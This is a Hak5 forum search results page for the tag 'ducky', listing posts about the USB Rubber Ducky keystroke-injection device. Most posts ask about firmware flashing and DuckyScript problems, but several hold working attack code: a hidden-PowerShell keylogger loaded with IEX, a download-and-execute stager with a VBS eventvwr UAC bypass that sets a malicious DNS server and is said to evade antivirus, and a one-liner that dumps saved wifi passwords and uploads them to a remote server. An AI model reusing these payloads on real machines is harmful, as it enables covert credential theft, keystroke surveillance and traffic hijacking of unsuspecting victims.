Search the Community

Showing results for tags 'ducky'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 51 results

  1. Introducing the latest Composite Firmware - Codename : The Twin Duck The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. Its multi-OS, multi-lingual and comes in three flavours: c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions) c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK c_duck_v2_S002.hex - Triggered on Ducky's GPIO only! Depending on your circumstances, you may want to use either one of these available firmwares. Downloads Please test and post feedback here. Snake
  2. So I literally just finished copying this tutorial ... And everything went smoothly... Apart from when I plugged in the duck... Nothing happened on my Kali MSF... No shells were caught? I should first off mention that my target machine was actually a 64 bit windows, so i had to change the msfvenom -a to x64 and change the payload to windows/x64/meterpreter/reverse_tcp... But besides that everything went ok... So because the shell wasnt being caught, I decided to open up powershell my self, and manually type in the code that the ducky inject.bin is trying to run in powershell.... and i got this error... So I think the reason nothing happens when I plug the duck in, is because in the background (because obviously it is commanded to be hidden in the inject.bin) this is happening... making MSF not catch a shell... Please could anyone take a look at this and help me overcome this error please. I would be forever grateful! Thank you hak5 enthusiasts! <3
  3. Hello fellow Hak5 enthusiasts! I just wanted to run a quick question by you. Would it be possible to set the rubber ducky up in such a way that... When you plug the ducky in, it runs a script to check for the IP in the ipconfig in windows CMD, and then save the ip to a file within the USB? While also, the ducky acting as a USB drive? So as its doing its thing with ipconfig, you can also browse to files on the ducky that I have saved... Possibly an Image file? So it tricks the target into thinking this is just an ordinary usb drive with a picture on it... But in the back ground, grabbing the IP?
  4. Hello, I'm trying to compile custom firmware for a rubberducky, because I want to change the ducky's serialnumber. I've found the setting I want to change: \USB-Rubber-Ducky-master\Firmware\Source\Mass_Storage\USB\src\config\conf_usb.h > define USB_DEVICE_SERIAL_NAME "..." // Disk SN for MSC So now I just need to compile this into new working firmware. But I can't find a guide on doing this anywhere, and I haven't done much compiling/coding, so I don't have the experience to do it on my own. I've downloaded "Atmel Studio 7.0" since I read somewhere that that is what's needed, but after a lot of clicking arround and opening files and pressing buttons, I can't seem to get it to compile anything.. Can anyone help me with this? FYI: I've done my fair share of coding for arduino's/pi's and hardware hacking so I'm not a complete noob, but this has left me flustered a bit...
  5. !! EDIT !! !! Now updated so it should be very fast and effective !! !! This is a remake of my bashbunny script so it works on the rubberducky too !! Hello everyone! I made this nice script that gives you a lot of information about your victims computer and stores it on the rubberducky if it runs twin duck firmware. for example their ip and public ip Change it as much as you want, but please make me as source since I spent around 15 hours on this It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files i upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY. Rememeber this only works if you use the twin duck firmware on you rubberducky. :) The information you grab from you victim will be saved inside a folder called Loot. You can either download the files from my github and Pentesting/RubberDucky/Infograbber rubberducky version or download the rar file I uploaded here. :)
  6. So I finally got around to buying a Duck for some testing, was originally using Linux to flash but needed to test something and only had a Windows box available, the flashing instructions are out of date/missing etc.. Although Darrens github has up to date files, nothing is pointing to the newer file dump under the wiki . So here's a quick way to get you up and running under Windows if you would like to change to twin duck,fat duck, etc. Download and extract contents to a folder (I suggest c:\ducky-flasher) Install JRE_Flip_Installer_3.4.2.exe Remove SD card from ducky, hold down programming button on top while inserting into USB slot extract to it's own folder, Open up Device Manager Then look for a DFU-xxx under USB Devices Right Click Update Driver Then Manually specify driver location and browse to the folder you extracted the atmel drivers to. 5. There's a program.bat file in the ducky-flasher directory, edit it and copy/paste the code at bottom of this post and save, this makes it easier to flash the firmware from current directory instead of navigating to the Flip directory it also determines Flip's x32 or x64 bit install directory. 6. Open a command prompt and navigate to ducky-flasher folder and type any 1 of the following 5 firmware types you want: program Firmware\duck_v2.hex program Firmware\m_duck_v2.hex program Firmware\USB_v2.hex program Firmware\c_duck_v2.hex program Firmware\c_duck_v2_S001.hex program Firmware\c_duck_v2_S002.hex If all goes well you should see a something like the image attached, disregard the "WARNING: The user program and the bootloader overlap!" message. You should be good to go. Program.bat @echo off rem setup console title RubberDucky Programming @echo ____________________________________________ @echo [#] RubberDucky Programming Script @echo [-] Programming File: [%~dp0%1] if "%~dp0%1"=="" ( goto :bail ) if not exist %~dp0%1 ( goto :bail ) if defined PROGRAMFILES(X86) ( cd "%ProgramFiles(x86)%\Atmel\Flip 3.4.2\bin\" ) ELSE ( cd "%ProgramFiles%\Atmel\Flip 3.4.2\bin\" ) batchisp -device at32uc3b0256 -hardware usb -operation erase f memory flash blankcheck loadbuffer %~dp0%1 program verify start reset 0 cd %~dp0 goto :done :bail @echo [!] Please provide valid input (.hex) file! :done goto :eof
  7. Is this a thing? There's no documentation about it...? Alternative (preferably just use backspace, but this could work...): # One backspace Q LEFTARROW Q DELAY 100 Q DELETE Also, thought I should mention in the readme.txt file in the 'docs' folder on the Bunny, there are two 'SPACE' commands listed in the Ducky Script area. Maybe one of those was supposed to be BACKSPACE? Though the command doesn't work..
  8. i have created an information recon payload for the usb rubber ducky you download it at
  9. The Wifi password grabber has been working great for the PC's ive used it on. Then i noticed something, On networks with two or more words in their SSID (etc; Park Home, Meme House or KFC Wifi) The Ducky will output : Network type: %B%, Authentication: %C%, Password: %D%, Instead of the normal Values. This only happens on networks with more than 2 words in their SSID. Any way to fix it? Link to the github with the wifi payload:
  10. Hello! I have run into a problem on the new 1.1 Firmware for the BashBunny! The problem is that I am not able to use a diffrent keymap than US, in this case SE. Before you sat the languages by QUACK SET_LANGUAGE se but know according to the new readme in the docs folder you set the languages by DUCKY_LANG=us. With and without QUACK in front of it I don't get it to work. I have copied all the .json languages files from ducky installer to the languages folder, maybe the problem is that I have not installed the languages files correctly. Help would be appreciated.
  11. So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text files. So fair I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to usb within seconds, to grab and go. I just need help with one thing... How to hide the powershell window and is there anyway of making this script better (I already know i can use powershell to sent txt files to servers or through email i just think its easier with such a simple script to dump it straight back to usb)? Here is the Script
  12. Hey all, I'm interested in compiling Ducky Script to c++ that will run on an arduino. I would like to take ducky scripts such as the Wallpaper prank, and be able to easily put it on an arduino without having to modify any code myself. Why use an arduino? I have a lot of them, and I would like to take advantage of them. While I did manually write the code for the wallpaper prank in c++ last night, I would like the process to be streamlined by a compiler. I've done some research already and have tried out a few compilers that people have made, such as the Duckuino compiler, but the ones I've found are buggy and throw errors when the arduino IDE is compiling the c++ produced by the Ducky Script compiler. My question is, does anyone know of a working compiler that will take Ducky Script and push it to valid arduino code; or should I just fix the bugs in the Duckuino repo? Let me know if you need more info, or if I'm unclear anywhere. Thanks!
  13. Hey Rubber Ducky users! So I have recently purchased a Rubber Ducky and started scripting. I went ahead and got some scripts of the github repo and none of them worked properly. Then I went ahead to write the scripts myself starting with a simple Hello World working my way up. On the project of making a wallpaper prank script i noticed that some commands weren't working. The REPLAY command and the MENU/APP command are not executed. As this is a fresh Rubber Ducky, could this be a problem of firmware or could it be because I am using Windows 10? Or maybe a diffrent reason? Thanks in advance!
  14. Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. Here is the code: DELAY 500 GUI r DELAY 50 STRING powershell -WindowStyle hidden ENTER DELAY 100 STRING IEX (New-Object Net.WebClient).DownloadString('') ENTER DELAY 300 STRING Get-Keystrokes -LogPath C:\Users\Garrett\Desktop\testing123.txt -Timeout 1 ENTER Of course, go to the and encode it. Comment any suggestions / thoughts! I will be posting more scripts as I go. Also, I am working on a script to email the keylog file to your email. Will upload once I get that working. Hope you enjoy!
  15. Hey, everybody, I'm kinda new to rubber ducky (only know the very basic of script writing and stuff) Soo? I got my script with works as it should, no problem when I run it in terminal (on MacOSX) and that's both when I type it in manually but also if I run it from a TextEdit I then used a program called Platypus to make the script to a .app, still no problem. Now if I wanted to run that .app on inject of the ducky, how should I do that? Like I got the .app on the SD card, which I think is called NO NAME, so I wrote the inject.bin script to open terminal and locate the USB (NO NAME) and run the .app from there DELAY 3000 GUI SPACE DELAY 200 STRING Terminal DELAY 200 ENTER DELAY 200 STRING open /Volumes/NO\ NAME/*theappname*.app/ ENTER But it don't seem to be able to find the USB? is that because the USB doesn't show when plugged in, as an USB, but instead as a keyboard or what??... Am I doing something wrong, or is it basic that I can't access it like that? Read something about Twinduck firmware? can that help me, and would anybody recommend it anyways? Ideas, support and info are much appreciated. Thx and sorry if bad English (second language)
  16. The programming language, dubbed DuckyScript, is a simple instruction-based interface to creating a customized payload. However, it runs independently from the microcontroller that installs the drivers to the machine. On some older models running Windows XP, the device took upwards of 60 seconds to install the drivers. On newer machines running Windows 7, it took anywhere from 10-30. And if the drivers take longer to install than the delay you put at the beginning of your payload, it will begin firing off anyways. Source:
  17. I just got the usb rubber ducky in the mail and trying to flash twinduck, but cant get the usb rubber ducky in dfu mode ive tried everything, holding it before putting it in the laptop nothing is working, and seems like this forum is the only place to get support for this, unless someone knows how to get ahold of the people who makes it
  18. Hello all, i am new with rubber ducky, can anyone explain the below things to me so that i can get a clear image for it. can i use it as a usb mass storage device ? like it should show in PC that new mass storage device found and i can put files into it directly ( the mounted sdcard space) ? without remove sd card again and again ? will payloads wrok ? if i put files directly from PC into sdcard (without removing) using ducky usb port ? will ducky works (executes the commands / keyboards key ) while pluging into PC first time ? like as i feel like it does'nt work on first time it detects and install drivers and i have to re-plugin again to get it work. Thank you in advance, please explain a bit and suggest.
  19. Hello, it looks like i placed topic in wrong area so posting here in relative one ( as i thought i will not get reply on that post which is not related), sorry for that. i am new with rubber ducky, can anyone explain the below things to me so that i can get a clear image for it. can i use it as a usb mass storage device ? like it should show in PC that new mass storage device found and i can put files into it directly ( the mounted sdcard space) ? without remove sd card again and again ? will payloads wrok ? if i put files directly from PC into sdcard (without removing) using ducky usb port ? will ducky works (executes the commands / keyboards key ) while pluging into PC first time ? like as i feel like it does'nt work on first time it detects and install drivers and i have to re-plugin again to get it work. Thank you in advance, please explain a bit and suggest.
  20. Hi! I just got my new rubber ducky and I wanted to get the duck to look like "a real USB device" when you plug it in. I got my inspiration from the HAK5´s own video ( The thing that i dont seem to understand is how I "install" the code to my rubber ducky. I am looking at the page as we speak but I dont understand how I am supposed to do. Do I just move the " c_duck_v2.1.hex" file to the ducky disk or is it something that I am missing? Pls help me, I am new to this. Be kind in the comments pls
  21. Hi Guys, I'm pen-testing my fathers business network and I am using the Arduino Micro to input commands into the command Prompt. However when the Arduino try's to input an email address to email a log back to the 'hacker' the @ symbol in the Arduino script appears as an " in command Prompt??Any help is appreciated.Many ThanksCharlie
  22. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie
  23. Hi there, This simple script doesnt seem to work: DELAY 3000 GUI SPACE <-- This doesnt open the Spotlight search bar DELAY 500 STRING DELAY 500 ENTER DELAY 750 STRING Hello World!!! ENTER Any ideas? Thanks! :-)
  24. Hi all, I've created a ducky script which works fine when I execute the commands by hand, but fails after being encoded and run with the duck. The line in the code is: STRING $d=netsh wlan show profiles|sls -Pattern 'All User'|Foreach{$_.ToString()};$c=$d|Foreach{$_.Replace(' All User Profile : ',$null)};$z=ForEach($w in $c){netsh wlan show profiles $w key=clear};$p=$z|sls -Pattern 'SSID name','Key Content';(New-Object Net.WebClient).UploadString('http://IP_REMOVED/rx.php', $p) However the quote between -Pattern and All User is being dropped, as well as a single space from ' All User Profile'. Does anyone know why the encoding fails/does this? Bug in encoder? Cheers, Void
  25. Hey guys, just got my USB rubber Ducky today. I flashed the Twin Duck firmware and generatet a inject.bin. My Problem is that my Windows 7 Maschine always interrupt the Script by trying to open the inject.bin file. is there a Solution for that? P.S. sry if my english is bad ( Iam from Germany)